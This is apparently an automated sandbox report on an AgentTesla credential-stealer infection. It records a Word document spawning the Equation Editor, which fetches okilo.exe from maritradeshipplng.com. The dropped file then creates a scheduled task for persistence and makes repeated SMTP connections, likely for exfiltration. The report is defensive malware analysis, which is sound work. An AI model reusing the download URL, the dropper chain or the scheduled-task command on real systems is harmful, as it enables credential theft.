Jul 22, 2021 17:32:06.064508915 CEST | 8.8.8.8 | 192.168.2.22 | 0x2339 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:14.910052061 CEST | 8.8.8.8 | 192.168.2.22 | 0xdad7 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:14.960225105 CEST | 8.8.8.8 | 192.168.2.22 | 0xdad7 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:25.101026058 CEST | 8.8.8.8 | 192.168.2.22 | 0x41b6 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:32.733392954 CEST | 8.8.8.8 | 192.168.2.22 | 0xbe06 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:32.786246061 CEST | 8.8.8.8 | 192.168.2.22 | 0xbe06 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• maritradeshipplng.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 104.21.27.166 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:30:49.633574009 CEST | 0 | OUT | GET /wayss/okilo.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: maritradeshipplng.com
    Connection: Keep-Alive
Jul 22, 2021 17:30:50.002737045 CEST | 2 | IN | HTTP/1.1 200 OK
    Date: Thu, 22 Jul 2021 15:30:49 GMT
    Content-Type: application/octet-stream
    Content-Length: 918016
    Connection: keep-alive
    Last-Modified: Thu, 22 Jul 2021 07:16:32 GMT
    ETag: "e0200-5c7b11105d9f8"
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A4WScKmZaLuRICl5Vg8CWsrWHYZxehHOeC9R%2Fs8kP8xwh%2F0GSl%2F6oRcZSoMzklCMUv%2B2QB5AuT7aOfp81JZ0a8ZaFRiQxuOa%2F2x4XKv8LFBLHelWLzwkMQ8813jnYWu9lWjtKT5SQCE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 672db66479d040e9-LHR
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jul 22, 2021 17:31:50.744883060 CEST | 587 | 49168 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com prod Mail Node
Jul 22, 2021 17:31:50.745497942 CEST | 49168 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 066656
Jul 22, 2021 17:31:50.934009075 CEST | 587 | 49168 | 198.54.122.60 | 192.168.2.22 | 250-mta-08.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-CHUNKING
    250 STARTTLS
Jul 22, 2021 17:31:50.934842110 CEST | 49168 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jul 22, 2021 17:31:51.122312069 CEST | 587 | 49168 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jul 22, 2021 17:31:59.024944067 CEST | 587 | 49170 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com prod Mail Node
Jul 22, 2021 17:31:59.025263071 CEST | 49170 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 066656
Jul 22, 2021 17:31:59.212789059 CEST | 587 | 49170 | 198.54.122.60 | 192.168.2.22 | 250-mta-08.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-CHUNKING
    250 STARTTLS
Jul 22, 2021 17:31:59.213057041 CEST | 49170 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jul 22, 2021 17:31:59.400476933 CEST | 587 | 49170 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jul 22, 2021 17:32:06.450463057 CEST | 587 | 49171 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com prod Mail Node
Jul 22, 2021 17:32:06.450862885 CEST | 49171 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 066656
Jul 22, 2021 17:32:06.641848087 CEST | 587 | 49171 | 198.54.122.60 | 192.168.2.22 | 250-mta-08.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-CHUNKING
    250 STARTTLS
Jul 22, 2021 17:32:06.642119884 CEST | 49171 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jul 22, 2021 17:32:06.832670927 CEST | 587 | 49171 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jul 22, 2021 17:32:15.340521097 CEST | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com prod Mail Node
Jul 22, 2021 17:32:15.340907097 CEST | 49172 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 066656
Jul 22, 2021 17:32:15.528687954 CEST | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 250-mta-08.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-CHUNKING
    250 STARTTLS
Jul 22, 2021 17:32:15.529095888 CEST | 49172 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jul 22, 2021 17:32:15.718035936 CEST | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jul 22, 2021 17:32:25.486705065 CEST | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com prod Mail Node
Jul 22, 2021 17:32:25.487236023 CEST | 49173 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 066656
Jul 22, 2021 17:32:25.682280064 CEST | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 250-mta-08.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-CHUNKING
    250 STARTTLS
Jul 22, 2021 17:32:25.682760000 CEST | 49173 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jul 22, 2021 17:32:25.878017902 CEST | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jul 22, 2021 17:32:33.166738033 CEST | 587 | 49174 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com prod Mail Node
Jul 22, 2021 17:32:33.167226076 CEST | 49174 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 066656
Jul 22, 2021 17:32:33.357281923 CEST | 587 | 49174 | 198.54.122.60 | 192.168.2.22 | 250-mta-08.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-CHUNKING
    250 STARTTLS
Jul 22, 2021 17:32:33.357748032 CEST | 49174 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jul 22, 2021 17:32:33.546351910 CEST | 587 | 49174 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 17:30:35
Start date: 22/07/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f7e0000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:30:36
Start date: 22/07/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:30:39
Start date: 22/07/2021
Path: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
Imagebase: 0x9d0000
File size: 918016 bytes
MD5 hash: E85A0E1E81ACBCEA6A0E10EEEDF32F6D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 24%, ReversingLabs
Reputation: low

                                                                                                            General

                                                                                                            Start time:17:31:04
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                                                                                                            Imagebase:0xbf0000
                                                                                                            File size:179712 bytes
                                                                                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:17:31:05
                                                                                                            Start date:22/07/2021
                                                                                                            Path:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Imagebase:0x9d0000
                                                                                                            File size:918016 bytes
                                                                                                            MD5 hash:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            Disassembly

                                                                                                            Code Analysis
